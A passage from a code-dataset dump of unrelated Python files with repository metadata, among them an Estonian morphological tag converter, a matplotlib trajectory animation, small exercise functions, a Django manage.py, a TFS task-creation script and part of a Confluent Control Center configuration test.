'^.?<.*>$'\n\tmissing_morf = {}\n\ti = 0\n\tg_input_line_nr = 0\n\tarr_sentence = []\n\tin_sentence = False\n\teprint()\n\twith f_input as fp:\n\t\tfor line in fp:\n\t\t\tg_input_line_nr += 1\n\t\t\tline = line.strip()\n\t\t\tif line == '':\n\t\t\t\tcontinue\n\t\t\telif '1' in flags:\n\t\t\t\t\n\t\t\t\tmatch_tag = re.match(tag_line_pattern, line)\n\t\t\t\tif not match_tag:\n\t\t\t\t\tarr_sentence = []\n\t\t\t\t\tarr_sentence.append(line)\n\t\t\t\t\tmakeDictFromArray(arr_sentence, i)\n\t\t\t\t\t#sys.stderr.write('%d..' % g_input_line_nr)\n\t\t\t\t\t#sys.stderr.flush()\n\t\t\t\t\tsentence = transform_with_weight(g_d_sentence, dict)\n\t\t\t\t\tf_out.write(construct_inforem_sentence(g_d_sentence, i))\n\t\t\t\t\tarr_sentence = []\n\n\t\t\telif line == '' and in_sentence == False:\n\t\t\t\ti += 1\n\t\t\t\tin_sentence = True\n\t\n\t\t\telif line == '' and in_sentence == True:\n\t\n\t\t\t\tin_sentence = False\n\t\t\t\tsys.stderr.write('%d..' 
% i)\n\t\t\t\tsys.stderr.flush()\n\t\n\t\t\t\tmakeDictFromArray(arr_sentence, i)\n\t\n\t\t\t\t#print (arr_sentence)\n\t\t\t\tarr_sentence = []\n\t\n\t\t\t\tsentence = transform_with_weight(g_d_sentence, dict)\n\t\t\t\tf_out.write(construct_inforem_sentence(g_d_sentence, i))\n\t\n\t\n\t\t\telif in_sentence:\n\t\t\t\t#print (line)\n\t\t\t\tarr_sentence.append(line)\n\tif missing_morf:\n\t\teprint()\n\t\teprint (bColors.pattern_blue % '\\tMissing morf tags:')\n\tfor morf in sorted(missing_morf):\n\t\teprint (bColors.pattern_blue % ('\\t\\t%s'%morf))\n\t\n\treturn 1\n\n\ndef read_local_conf(conffilename):\n\tglobal global_conf\n\ttry:\n\t\tf_tsv_conf = codecs.open(conffilename, \"r\", \"utf-8\")\n\t\tif 'v' in global_conf['conf']['verbose']:\n\t\t\teprint(bColors.pattern_bold % ('Reading conf from %s' % conffilename))\n\texcept IOError:\n\t\teprint(bColors.pattern_red % ('Cannot open %s' % conffilename))\n\t\treturn 0\n\t\t\n\tdict_rows_count=0\n\twith f_tsv_conf as tsv:\n\t\tfor line in tsv:\n\t\t\tline = line.strip()\n\t\t\trow = line.split(\"\\t\")\n\t\n\n\t\t\tif row[0][:1]=='#':\n\t\t\t\tcontinue\n\t\t\telif row[0][:1]=='':\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tparams = row[0].split('.')\n\t\t\t\tif params[0] == 'dict_weight' and len(params)==2 and len(row)>1:\n\t\t\t\t\tvalue = row[1].strip()\n\t\t\t\t\tif params[1] in global_conf['dict_weight']:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tglobal_conf['dict_weight'][params[1]]\t= int(value)\n\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\teprint(bColors.pattern_red % ('\\tInvalid \\'dict_weight value\\' for \\'%s\\' in configuration file. \\'%s\\' should be int.'%(params[1], value)))\n\t\t\t\t\t\t\t\n\t\t\t\telif params[0] == 'conf' and len(params)==2 and len(row)>1:\n\t\t\t\t\tvalue = row[1].strip()\n\t\t\t\t\tif params[1] == 'output_extension' and len(value):\n\t\t\t\t\t\t global_conf['conf']['output_extension']\t= value\n\t\t\t\t\telif params[1] == 'output_folder' and len(value):\n\t\t\t\t\t\tglobal_conf['conf']['output_folder']\t = value\n\t\t\t\t\telif params[1] == 'default_dictionary' and len(value):\n\t\t\t\t\t\tglobal_conf['conf']['default_dictionary']\t = value\n\t\t\t\t\telif params[1] == 'additional_dictionary' and len(value):\n\t\t\t\t\t\tglobal_conf['conf']['additional_dictionary']\t = value\n\treturn 1\n\n##################################\n#\n#################################\nimport getopt\ndef usage():\n\t\n\tprint (\"Usage ....\")\n\ndef main():\n\n\toptions = {}\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"h1c:d:a:f:e:\", [\"help\", \"1_line_mode\", \"dictionary=\", \"dictionary_additional=\"])\n\t\t\n\t\t#print (opts)\n\texcept getopt.GetoptError as err:\n\t\t# print help information and exit:\n\t\teprint (\"option is not recognized\")\n\t\tusage()\n\t\tsys.exit(2)\n\toutput = None\n\tverbose = False\n\tfor o, a in opts:\n\t\tif o == \"-v\":\n\t\t\tverbose = True\n\t\telif o in (\"-h\", \"--help\"):\n\t\t\tusage()\n\t\t\tsys.exit()\n\t\telif o in (\"-c\"):\n\t\t\toptions['local_conf'] = a\n\t\telif o in (\"-d\"):\n\t\t\toptions['default_dictionary'] = a\n\t\telif o in (\"-a\"):\n\t\t\toptions['additional_dictionary'] = a\n\t\telif o in (\"-f\"):\n\t\t\toptions['output_folder'] = a\n\t\telif o in (\"-e\"):\n\t\t\toptions['output_extension'] = a\n\t\telif o in (\"-1\"):\n\t\t\toptions['1'] = '1'\n\t\t\t\n\t\t\t\n\t\t\t\n\t\telse:\n\t\t\tassert False, (\"unhandled option %s\"%o)\n\t\n\tinput_files = args\n\toptions['input_files'] = input_files\n\treturn options\n\t\n\n\n################################\n# 
START\n##############################\n\n\n\n#parsing dictionary\n\t\t\nscript_name = (os.path.realpath(__file__))\nscript_dir = os.path.dirname(script_name)\n\n\n\n\n\n\nglobal_conf = {}\n\n\n#DEfault values\nglobal_conf['dict_weight'] = {\n\t'lemma+' : 100\n\t, 'lemma-' : 100\n\t, 'prev_lemma+' : 70\n\t, 'prev_lemma-' : 70\n\t, 'next_lemma+' : 70\n\t, 'next_lemma-' : 70\n\t, 'clause_lemma+' : 50\n\t, 'clause_lemma-' : 50\n\t\n\t, 'prev_morf+' : 65\n\t, 'prev_morf-' : 65\n\t, 'next_morf+' : 65\n\t, 'next_morf-' : 65\n\t, 'clause_morf+' : 50\n\t, 'clause_morf-' : 50\n\n\t, 'gramcat+' : 25\n\t, 'gramcat-' : 25\n\t, 'prev_gramcat+' : 24\n\t, 'prev_gramcat-' : 24\n\t, 'next_gramcat+' : 24\n\t, 'next_gramcat-' : 24\n\t, 'clause_gramcat+' : 20\n\t, 'clause_gramcat-' : 20\n\t\n\t\n\t}\n\n\n\n\nglobal_conf['conf'] = {}\n\nglobal_conf['conf']['output_extension'] = 'mrf.inforem'\nglobal_conf['conf']['output_folder'] = '.'\n\nglobal_conf['conf']['default_dictionary'] = script_dir+'/dictionaries/giella2cg.tab'\nglobal_conf['conf']['default_conffile'] = script_dir + '/conf/conf.tab'\nglobal_conf['conf']['verbose'] = 'v'\nglobal_conf['conf']['flags'] = ''\n\ncommandline_options = {}\n\nif __name__ == \"__main__\":\n\tcommandline_options = main()\n\nflags = ''\n\n\n\nif 'local_conf' in commandline_options:\n\tglobal_conf['conf']['default_conffile'] = commandline_options['local_conf']\n\t\n\n\n\n\nif '1' in commandline_options:\n\tglobal_conf['conf']['flags'] += '1'\n\t#ei lobise nii palju\n\tglobal_conf['conf']['verbose'] = ''\n#override conf with conffile\nread_local_conf(global_conf['conf']['default_conffile'])\n\nif 'output_folder' in commandline_options:\n\tglobal_conf['conf']['output_folder'] = commandline_options['output_folder']\n\nmake_sure_path_exists(global_conf['conf']['output_folder'])\n\n\nif 'output_extension' in commandline_options:\n\tglobal_conf['conf']['output_extension'] = commandline_options['output_extension']\n\n\nif 'default_dictionary' in commandline_options:\n\tglobal_conf['conf']['default_dictionary'] = commandline_options['default_dictionary']\n\n\n#additional dictionary\nif 'additional_dictionary' in commandline_options:\n\tglobal_conf['conf']['additional_dictionary'] = commandline_options['additional_dictionary']\n\t\n\nif '1' in commandline_options and 'v' in global_conf['conf']['verbose']:\n\t\teprint('\\t%s\\t%s' % ('1-line mode', 'activated'))\n\t\t\n\t\t\ninputfiles = commandline_options['input_files']\n\n\n\nif 'v' in global_conf['conf']['verbose']:\n\teprint()\n\teprint(bColors.pattern_bold % 'morf2morf.py is running with the following params:')\n\teprint('\\t%s\\t\\t%s' % ('local_conffile', global_conf['conf']['default_conffile']))\n\teprint('\\t%s\\t\\t%s' % ('output_folder', global_conf['conf']['output_folder']))\n\teprint('\\t%s\\t\\t%s' % ('output_extension', global_conf['conf']['output_extension']))\n\teprint('\\t%s\\t\\t%s' % ('default_dictionary', global_conf['conf']['default_dictionary']))\n\tif 'additional_dictionary' in global_conf['conf']:\n\t\teprint('\\t%s\\t\\t%s' % ('additional_dictionary', global_conf['conf']['additional_dictionary']))\n\tif len(inputfiles):\n\t\teprint('\\t%s' % 'Input files:')\n\t\tfor ifile in inputfiles:\n\t\t\teprint('\\t\\t%s' % ifile)\n\teprint()\n\n\n\n#parsing dictionary\ndict = read_parse_dict(global_conf['conf']['default_dictionary'])\n\n#additional dictionary\nif 'additional_dictionary' in global_conf['conf']:\n\tdict = read_parse_dict(global_conf['conf']['additional_dictionary'], dict)\n\n\n#global variables\nglobal 
g_d_sentence\nglobal g_input_line_nr\nglobal missing_morf\n\n\nfor input in inputfiles:\n\ttry:\n\t\tf_input = codecs.open(input, \"r\", \"utf-8\")\n\t\toutput = global_conf['conf']['output_folder'] +'/' + path_leaf(input) + '.' + global_conf['conf']['output_extension']\n\texcept IOError:\n\t\teprint(bColors.pattern_red % ('Cannot open ' + input))\n\t\tcontinue\n\teprint()\n\teprint(bColors.pattern_bold % (\"%s -----> %s\" % (input, output)))\n\t# open output file\n\ttry:\n\t\tf_out = codecs.open(output, \"w\", \"utf-8\")\n\t\t\n\t\n\texcept IOError:\n\t\teprint(bColors.pattern_red % ('Cannot open ' + output))\n\t\tcontinue\n\t\t\n\ttranslate(f_input, f_out)\n\n\tf_out.close()\n\tf_input.close()\n\t\nif not len(inputfiles) :\n\tif isPythonVersion(2.7):\n\t\treload(sys)\n\t\tsys.setdefaultencoding('utf-8')\n\ttranslate(sys.stdin, sys.stdout)\n\n\n\t\neprint()\nexit()\n","repo_name":"EstSyntax/SAMEST-morfoloogilised-kategooriad","sub_path":"morf2morf/morf2morf.py","file_name":"morf2morf.py","file_ext":"py","file_size_in_byte":29565,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"4352532322","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.offsetbox import OffsetImage, AnnotationBbox\n\n\"Animation of the trajectory of a particle (newtonian_dynamics.f90)\"\n\ndata_type = np.dtype([(\"t\", np.float32),\\\n (\"x\", np.float32),\\\n (\"y\", np.float32),\\\n (\"z\", np.float32),\\\n (\"vx\", np.float32),\\\n (\"vy\", np.float32),\\\n (\"vz\", np.float32)])\ndata = np.fromfile(\"out1.dat\", dtype=data_type)\n\n\nbim = plt.imread(\"assets/man.png\") # background image\noi = OffsetImage(plt.imread(\"assets/ball.png\"),zoom=0.5) # image for points\n\nfor i in range(0,data[\"t\"].shape[0],2):\n # Background still image\n plt.imshow(bim, origin=\"upper\", extent=[-2,-1.3,0,2])\n\n plt.scatter([data[\"x\"][i]],[data[\"y\"][i]])\n\n # Subtitutes points by images\n ab = AnnotationBbox(oi, (data[\"x\"][i], data[\"y\"][i]), frameon=False)\n plt.gca().add_artist(ab)\n\n\n # Animation settings\n plt.pause(0.001) # controls frames per second\n plt.clf() # clears figure for next frame\n plt.cla() # clears artist for next frame\n plt.xlim(-2,2) # scene x range\n plt.ylim(-2,2) # scene y range\n #plt.axis(\"off\")\n\nplt.show()\n","repo_name":"gandreoliva/physics_prog_collection","sub_path":"exercises/newtonian_dynamics_animate_plt.py","file_name":"newtonian_dynamics_animate_plt.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20552729074","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n###\n# Name: Jack Savage Student ID: 2295072 Email: jsavage@chapman.edu Course: \n# PHYS220/MATH220/CPSC220 Fall 2018 Assignment: CW03\n###\n\n\"\"\"This module reads the input of a number and returns an array of the first n \nFibonacci numbers in a list \"\"\"\n\n# return a list containing the fibonacci series up to n.\ndef fibonacci(n):\n '''Fibonacci function\n Args:\n n: number of fibonacci numbers to calculate\n Returns:\n List containing first n fibonacci numbers\n Raises:\n Custom Exception 'Exception':\n Thrown if n < 1\n Instructs user to enter value larger than 0\n TypeError:\n Thrown by non-integer value of n\n '''\n if n < 1:\n raise Exception('Please enter a value larger than 0')\n \n result = []\n x = 0\n y = 1\n z = 1\n \n #try:\n for i in range(n):\n z = x + y\n result.append(z)\n y = x\n x = z\n return result 
\n\n","repo_name":"chapman-phys220-2018f/cw03-thepenguins","sub_path":"sequences.py","file_name":"sequences.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37054523381","text":"#!/usr/bin/env python\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\nimport os\nimport re\nimport sys\n\ndef load_env():\n try:\n with open('./envs/.env') as f:\n content = f.read()\n except IOError:\n content = ''\n for line in content.splitlines():\n m = re.match(r'\\A([A-Za-z_0-9]+)=(.*)\\Z', line)\n if m:\n key, val = m.group(1), m.group(2)\n os.environ.setdefault(key, val)\n\n\ndef main():\n \"\"\"Run administrative tasks.\"\"\"\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"petstagram.settings\")\n try:\n from django.core.management import execute_from_command_line\n except ImportError as exc:\n raise ImportError(\n \"Couldn't import Django. Are you sure it's installed and \"\n \"available on your PYTHONPATH environment variable? Did you \"\n \"forget to activate a virtual environment?\"\n ) from exc\n execute_from_command_line(sys.argv)\n\n\nif __name__ == \"__main__\":\n load_env()\n main()\n","repo_name":"Minkov/petstagram","sub_path":"petstagram/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"25669087555","text":"# from functools import wraps\nimport sys\nfrom ._levels import Levels\n\n# test_method_name = 'test_call'\n\"\"\"class test(object):\n def __init__ (self, *args, **kwargs):\n # store arguments passed to the decorator\n self.args = args\n self.kwargs = kwargs\n\n def __call__(self, func):\n def test_call(*args, **kwargs):\n #the 'self' for a method function is passed as args[0]\n slf = args[0]\n\n # replace and store the attributes\n saved = {}\n for k,v in self.kwargs.items():\n if hasattr(slf, k):\n saved[k] = getattr(slf,k)\n setattr(slf, k, v)\n\n # call the method\n ret = func(*args, **kwargs)\n\n #put things back\n for k,v in saved.items():\n setattr(slf, k, v)\n\n return ret\n test_call.__doc__ = func.__doc__\n return test_call \"\"\"\n\nTEST_METHOD_NAME = \"test_alpha_in\"\n\n\ndef test(\n mandatory: bool = False,\n save: bool = False,\n description: str = None,\n stop: bool = True,\n disable: bool = False,\n level: Levels = Levels.MEDIUM,\n):\n def test_alpha_in(func):\n def test_wrapper(*args, **kwargs):\n TestClass = args[0]\n TestClass.output = None\n\n output = func(*args, **kwargs)\n \n if TestClass.output is not None:\n # When using assertions\n TestClass.outputs[func.__name__] = TestClass.output\n return TestClass.output\n else:\n # output is not None only when using return\n TestClass.outputs[func.__name__] = output\n return output\n\n if hasattr(func, \"__name__\"):\n test_wrapper.__name__ = func.__name__\n parameters = {\n \"save\": save,\n \"description\": description,\n \"stop\": stop,\n \"disable\": disable,\n \"level\": level,\n \"func\": func,\n }\n test_wrapper.__dict__ = parameters\n else:\n pass\n\n return test_wrapper\n\n return test_alpha_in\n\n\nsave_method_name = \"save_method_result\"\n\n\ndef save(func):\n def save_method_result(*args, **kwargs):\n get_return, get_name = False, False\n new_kwargs = {}\n args = list(args)\n\n for kw in kwargs.keys():\n if kw == \"get_return\":\n get_return = True\n elif kw == \"get_name\":\n get_name = True\n else:\n new_kwargs[kw] = kwargs[kw]\n\n return_save 
= AlphaSave.load(func.__name__)\n\n if get_return:\n return func(*args, **new_kwargs)\n elif get_name:\n return func.__name__\n else:\n return func(*args, **new_kwargs) == return_save\n\n return save_method_result\n","repo_name":"Tanguybes/alphaz","sub_path":"models/tests/_wrappers.py","file_name":"_wrappers.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37008430092","text":"def remove_accents(text):\n accents = {\n 'a': ['à', 'á', 'â', 'ã', 'ä', 'å', 'æ'],\n 'c': ['ç'],\n 'e': ['è', 'é', 'ê', 'ë', 'æ'],\n 'i': ['ì', 'í', 'î', 'ï'],\n 'n': ['ñ'],\n 'o': ['ò', 'ó', 'ô', 'õ', 'ö', 'ø'],\n 's': ['ß'],\n 'u': ['ù', 'ú', 'û', 'ü'],\n 'y': ['ÿ'],\n }\n\n for character, accents_list in accents.items():\n for accent in accents_list:\n text = text.replace(accent, character)\n\n return text\n\ndef main():\n text = \"La 16e Japan Expo (2-5 juillet), où 250 000 visiteurs sont attendus, le confirme : la France est — aussi — un pays de mangas. Plus de 1 500 titres sont publiés chaque année dans l’Hexagone, soit autant que les albums franco-belges. La très grande majorité de ces recueils au format poche est composée de titres préalablement parus au Japon dont les droits ont été achetés. Une sujétion au made in Japan inéluctable ? Pas si sûr, car une tendance s’amorce chez les éditeurs français : la création ex nihilo de séries, commandées directement auprès d’auteurs nippons.\"\n\n text_ascii = remove_accents(text)\n print(text_ascii)\n\nif __name__ == '__main__':\n main()\n","repo_name":"HanyAyad/Python-Practice","sub_path":"Assignment5/accent removal.py","file_name":"accent removal.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30229818388","text":"'''\n\n1. Download TFS power tools\nhttps://marketplace.visualstudio.com/items?itemName=TFSPowerToolsTeam.MicrosoftVisualStudioTeamFoundationServer2015Power\n\n2. Running the command\n i. Go to the TFS mapped path. Ex: D:\\TFS_WORKING_FOLDER\n ii. 
Execute the command \n Ex: tfpt workitem /new Project1\\Task /fields:\"Title=New;Area Path= myArea\\path;Assigned To= XXXXXX\"\n On success, message \"Work item 385356 created.\" is displayed.\n\n'''\n\nimport os\n\ndef CreateTask(title, assigned_to, description):\n \n command = 'tfpt workitem /new Project1\\Task /fields:\"Area Path= myArea\\path;Title=' + title +';'\n command += 'Assigned To='+ assigned_to + ';'\n command += 'Iteration Path= Iter\\Path;'\n command += 'Description=' + description \n \n #NOTE: Update the project path, area path and iteration path according to your project, before executing this script !!!\n \n print ('Command executed: ' + command)\n path = \"D:\\TFS_WORKING_FOLDER\"\n os.chdir(path)\n os.system(command) \n #Below message will be seen after command execution \"Work item 385356 created.\"\n\n\nCreateTask('title of task', 'myself', 'description of task')\n","repo_name":"manjunathmayya/youtube_videos","sub_path":"tfs_task_creation/tfs_task_creation.py","file_name":"tfs_task_creation.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"24999985091","text":"def function(array):\n \n urray=[]\n i=0\n \n while i < len(array):\n check=True\n j=0\n while j< len(array):\n if (array[i] == array[j]) and (i!=j):\n check=False\n break\n j=j+1\n if check :\n urray.append(array[i])\n i=i+1\n \n for i in urray:\n print (i)\n \n \nfunction([2,3,2,5,8,1,9,8])","repo_name":"student223708/year1","sub_path":"University/6/19.py","file_name":"19.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5451443049","text":"import unittest\nfrom unittest.mock import patch\nfrom jinja2 import Environment, FileSystemLoader\nimport confluent.docker_utils.dub as dub\nimport os\nimport random\n\n# complete set\nbasic_props = dict(\n CONTROL_CENTER_BOOTSTRAP_SERVERS=\"bootstrap.servers\",\n CONTROL_CENTER_ZOOKEEPER_CONNECT=\"zookeeper.connect\",\n CONTROL_CENTER_DATA_DIR=\"confluent.controlcenter.data.dir\"\n)\n\n# complete set\nrf_props = dict(\n CONTROL_CENTER_INTERNAL_TOPICS_REPLICATION=\"confluent.controlcenter.internal.topics.replication\",\n CONTROL_CENTER_COMMAND_TOPIC_REPLICATION=\"confluent.controlcenter.command.topic.replication\",\n CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_REPLICATION=\"confluent.monitoring.interceptor.topic.replication\",\n CONTROL_CENTER_METRICS_TOPIC_REPLICATION=\"confluent.metrics.topic.replication\",\n)\n\n# complete set\nrequired_props = {**basic_props, **rf_props}\n\n# incomplete set\nmonitoring_props = dict(\n CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC=\"confluent.monitoring.interceptor.topic\",\n CONTROL_CENTER_MONITORING_INTERCEPTOR_TOPIC_PARTITIONS=\"confluent.monitoring.interceptor.topic.partitions\"\n)\n\n# incomplete set\ncontrol_center_metrics_props = dict(\n CONTROL_CENTER_METRICS_TOPIC=\"confluent.metrics.topic\",\n CONTROL_CENTER_METRICS_TOPIC_RETENTION_MS=\"confluent.metrics.topic.retention.ms\"\n)\n\n# incomplete set\nconfluent_metrics_props = dict(\n CONFLUENT_METRICS_TOPIC=\"confluent.metrics.topic\",\n CONFLUENT_METRICS_TOPIC_REPLICATION=\"confluent.metrics.topic.replication\",\n CONFLUENT_METRICS_TOPIC_RETENTION_MS=\"confluent.metrics.topic.retention.ms\",\n)\n\n# incomplete set\nc3_optional_props = dict(\n CONTROL_CENTER_ID=\"confluent.controlcenter.id\",\n CONTROL_CENTER_NAME=\"confluent.controlcenter.name\",\n)\n\n# incomplete 
set\nmetadata_props = dict(\n CONFLUENT_METADATA_BOOTSTRAP_SERVER_URLS=\"confluent.metadata.bootstrap.server.urls\",\n CONFLUENT_METADATA_CLUSTER_REGISTRY_ENABLE=\"confluent.metadata.cluster.registry.enable\",\n)\n\n# incomplete set\nsupport_props = dict(\n CONFLUENT_SUPPORT_METRICS_ENABLE=\"confluent.support.metrics.enable\",\n CONFLUENT_SUPPORT_METRICS_SEGMENT_ID=\"confluent.support.metrics.segment.id\"\n)\n\n# complete set\nspecial_props = dict(\n CONFIG_PROVIDERS=\"config.providers\",\n CONFIG_PROVIDERS_SECUREPASS_CLASS=\"config.providers.securepass.class\",\n CONTROL_CENTER_LICENSE=\"confluent.license\",\n PUBLIC_KEY_PATH=\"public.key.path\"\n)\n\n# env_to_c3_prop_lookup: a map from environment property to correctly translated c3 property\nenv_to_c3_prop_lookup = {\n **required_props,\n **monitoring_props,\n **control_center_metrics_props,\n **confluent_metrics_props,\n **special_props,\n **c3_optional_props,\n **metadata_props,\n **support_props\n}\n\n\nclass PropsTranslationTest(unittest.TestCase):\n # test_env: a map from environment property to its expected value\n test_env = None\n\n # filled_template: a list of translated c3 property to its actual value\n # e.x. [ [ 'prop1','val1' ], [ 'prop2','val2' ] ]\n filled_template = None\n\n @classmethod\n def set_up_test_env(cls, test_env_props):\n cls.test_env = dict()\n for test_env_prop in test_env_props:\n # each property has a unique value. for example, { 'CONTROL_CENTER_ID' : '9999' }\n cls.test_env[test_env_prop] = str(random.randint(0, 10000))\n\n @classmethod\n def fill_template(cls):\n template_file = \"/etc/confluent/docker/control-center.properties.template\"\n\n j2_env = Environment(\n loader=FileSystemLoader(searchpath=\"../include\"),\n trim_blocks=True)\n j2_env.globals['env_to_props'] = dub.env_to_props\n template = j2_env.get_template(template_file)\n\n # fill the template with environment variable, split each line, filter out\n # the empty lines, then convert to a list\n actual = list(filter(None, template.render(env=os.environ).splitlines()))\n\n # split each property. for example line confluent.controlcenter.id=1 becomes\n # ['confluent.controlcenter.id', '1']\n cls.filled_template = list(line.split(\"=\") for line in actual)\n\n @classmethod\n def configure_partially(cls, props):\n # always randomly choose 1 prop from the list of props\n configured_props = [random.choice(list(props.keys()))]\n not_configured_props = props.keys() - configured_props\n return configured_props, not_configured_props\n\n @classmethod\n def check_translations(cls, env_props):\n # assume env_prop = 'CONTROL_CENTER_ID'\n for env_prop in env_props:\n # c3_prop is the correct c3 prop translation, which is 'confluent.controlcenter.id'\n c3_prop = env_to_c3_prop_lookup[env_prop]\n # assume expected_val = '9999'\n expected_val = cls.test_env[env_prop]\n # check if in the template file, confluent.controlcenter.id = 9999 as well\n cls.check_single_translation(c3_prop, expected_val)\n\n @classmethod\n def check_single_translation(cls, c3_prop, expected_val):\n # The translation from docker prop to c3 prop was correct, now assert the\n # value of the prop is correct.\n assert [c3_prop, expected_val] in cls.filled_template, \\\n \"For property %s expected val %s. 
This is the actual filled template: %s\" \\\n % (c3_prop, expected_val, cls.filled_template)\n\n @classmethod\n def check_filled_template_length(cls, expected_len=0):\n actual_len = len(cls.filled_template)\n assert expected_len == actual_len, \\\n \"filled template expected length %s, got %s\" % (expected_len, actual_len)\n\n def test_missing_required_properties(self):\n \"\"\"\n Testing SET_PROPERTIES's logic of required vs. not required.\n\n Test that when no environment variable is set, required properties are set with empty\n string.\n\n :return: pass if when no environment variable is set, required properties are set with \"\"\n \"\"\"\n configured_props, not_configured_props = self.configure_partially(required_props)\n self.set_up_test_env(test_env_props=configured_props)\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # all required props show up, regardless of if they are configured or not\n self.check_filled_template_length(expected_len=len(required_props))\n\n # required props that are configured show up with actual values\n self.check_translations(env_props=configured_props)\n\n # required props that are not configured show up with empty string\n for not_configured_prop in not_configured_props:\n c3_prop = env_to_c3_prop_lookup[not_configured_prop]\n assert [c3_prop, \"\"] in self.filled_template, \\\n \"required property %s should be empty since no environment variable is set\"\n\n def test_missing_optional_properties(self):\n \"\"\"\n Testing SET_PROPERTIES's logic of required vs. not required.\n\n Test that when no environment variable is set, optional properties are not set at all.\n\n Important to note: this test only uses monitoring_props to test that optional properties\n are not set if no environment variable is present. However, the same logic is applicable to\n other_props, \"CONFLUENT_METADATA_*\", \"CONFLUENT_SUPPORT_*\", \"CONTROL_CENTER_*\" properties\n as well.\n\n :return: pass if when no environment variable is set, optional properties are not set\n \"\"\"\n configured_props, not_configured_props = self.configure_partially(monitoring_props)\n self.set_up_test_env(test_env_props=configured_props)\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # however, optional props only show up if they are actually configured.\n self.check_filled_template_length(\n expected_len=len(required_props) + len(configured_props))\n\n # optional props that are configured show up with actual values\n self.check_translations(env_props=configured_props)\n\n # optional props that are not configured shouldn't show up at all\n actual_props = [li[0] for li in self.filled_template]\n for not_configured_prop in not_configured_props:\n c3_prop = env_to_c3_prop_lookup[not_configured_prop]\n assert c3_prop not in actual_props, \"property %s shouldn't be set\" % c3_prop\n\n def test_rf_properties_precedence(self):\n \"\"\"\n Testing SET_PROPERTIES's logic of precedence.\n\n 1. Test that replication factor properties default to CONTROL_CENTER_REPLICATION_FACTOR\n\n pass if confluent.controlcenter.internal.topics.replication\n confluent.controlcenter.command.topic.replication\n confluent.metrics.topic.replication\n confluent.monitoring.interceptor.topic.replication\n default to use CONTROL_CENTER_REPLICATION_FACTOR when they're not set.\n\n 2. 
Test that replication factor properties use their own value\n\n pass if the four rf props use their own value when corresponding env variable is set,\n even though CONTROL_CENTER_REPLICATION_FACTOR is present as well.\n\n :return: pass if both tests pass\n \"\"\"\n # 1. Test that replication factor properties default to CONTROL_CENTER_REPLICATION_FACTOR\n self.set_up_test_env(test_env_props=['CONTROL_CENTER_REPLICATION_FACTOR'])\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # rf props are part of the required props.\n self.check_filled_template_length(expected_len=len(required_props))\n\n # check that all rf props default to the value of CONTROL_CENTER_REPLICATION_FACTOR\n for rf_prop in rf_props.keys():\n self.check_single_translation(\n c3_prop=rf_props[rf_prop],\n expected_val=self.test_env['CONTROL_CENTER_REPLICATION_FACTOR'])\n\n # 2. Test that replication factor properties use their own value\n self.set_up_test_env(test_env_props=['CONTROL_CENTER_REPLICATION_FACTOR'] + list(rf_props.keys()))\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # rf props are part of the required props.\n self.check_filled_template_length(expected_len=len(required_props))\n\n # check that all rf props use their own value even though CONTROL_CENTER_REPLICATION_FACTOR is configured\n for rf_prop in rf_props.keys():\n self.check_single_translation(\n c3_prop=rf_props[rf_prop],\n expected_val=self.test_env[rf_prop])\n\n def test_metrics_rf_properties_precedence(self):\n \"\"\"\n Testing SET_PROPERTIES's logic of precedence, specifically metrics rf props.\n\n Test that confluent.metrics.topic.replication respect the following precedence:\n CONTROL_CENTER_METRICS_TOPIC_REPLICATION >\n CONFLUENT_METRICS_TOPIC_REPLICATION >\n CONTROL_CENTER_REPLICATION_FACTOR\n\n :return: pass if confluent.metrics.topic.replication respects the precedence\n \"\"\"\n # 1. Test CONTROL_CENTER_METRICS_TOPIC_REPLICATION should take precedence\n self.set_up_test_env(\n test_env_props=[\n 'CONTROL_CENTER_METRICS_TOPIC_REPLICATION',\n 'CONFLUENT_METRICS_TOPIC_REPLICATION',\n 'CONTROL_CENTER_REPLICATION_FACTOR'\n ]\n )\n\n with patch.dict('os.environ', self.test_env):\n self.fill_template()\n\n # required props show up regardless of if they are configured or not;\n # rf props are part of the required props.\n self.check_filled_template_length(expected_len=len(required_props))\n\n self.check_single_translation(\n c3_prop='confluent.metrics.topic.replication',\n expected_val=self.test_env['CONTROL_CENTER_METRICS_TOPIC_REPLICATION'])\n\n # 2. 
